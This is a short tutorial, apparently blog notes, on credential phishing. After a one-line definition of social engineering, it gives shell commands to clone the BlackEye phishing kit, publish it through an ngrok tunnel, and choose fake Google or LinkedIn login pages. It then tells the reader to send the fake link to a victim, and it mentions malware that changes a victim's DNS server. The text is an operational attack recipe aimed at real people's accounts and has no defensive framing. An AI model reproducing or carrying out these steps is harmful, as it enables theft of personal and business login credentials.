It is one of the social engineering attacks to gain access to the victim personal or business account. Social engineering is the term used for a broad range of malicious activities accomplished through human interactions. It uses psychological manipulation to trick users into making security mistakes or giving away sensitive information.
git clone https://github.com/An0nUD4Y/blackeye.git
cd blackeye
unzip ngrok-stable-linux-amd64.zip
cp ngrok blackeye
./ngrok authtoken [personal_token]
./ngrok http 80
cd blackeye
sudo ./blackeye # option: 6 for google, 9 for linkedin
http://127.0.0.1:4040/status
. Send the url to the victim. Here we can use social engineer toolkit (default in Kali Linux). You can send the fake link to the victim, or a file of malware to change DNS server which redirects you to another website.